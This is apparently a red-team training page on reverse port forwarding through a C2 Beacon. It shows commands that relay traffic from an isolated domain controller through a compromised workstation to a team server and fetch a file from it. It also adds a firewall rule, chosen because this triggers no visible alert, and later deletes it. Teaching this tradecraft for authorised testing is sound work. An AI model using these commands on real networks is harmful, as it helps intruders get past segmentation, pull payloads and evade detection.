Reverse Port Forwards

Reverse Port Forwarding allows a machine to redirect inbound traffic on a specific port to another IP and port. A useful implementation of this allows machines to bypass firewall and other network segmentation restrictions, to talk to nodes they wouldn't normally be able to. For example, we can use the console of Domain Controller 2 to demonstrate that it does not have any outbound access to our team server.

PS C:\Users\Administrator> hostname
dc-2

PS C:\Users\Administrator> iwr -Uri http://nickelviper.com/a
iwr : Unable to connect to the remote server

\

We know of course that Workstation 2 does - so we can create a reverse port forward to relay traffic between Domain Controller 2 and our team server.

beacon> rportfwd 8080 127.0.0.1 80
[+] started reverse port forward on 8080 to 127.0.0.1:80

\

This will bind port 8080 on Workstation 2.

beacon> run netstat -anp tcp
TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING

\

Any traffic hitting this port will be tunnelled back to the team server over the C2 channel. The team server will then relay the traffic to the forward host/port, then send the response back over Beacon. Now, we can download the file via this port forward.

PS C:\Users\Administrator> iwr -Uri http://wkstn-2:8080/a

StatusCode        : 200

\

\

You must therefore create an allow rule before running a reverse port forward using either netsh or New-NetFirewallRule, as adding and removing rules does not create a visible alert.

beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080

\

Don't be lazy by disabling the firewall entirely.

\

You can delete a firewall rule later by its DisplayName.

beacon> powershell Remove-NetFirewallRule -DisplayName "8080-In"
PreviousBrowsersNextNTLM Relaying

Last updated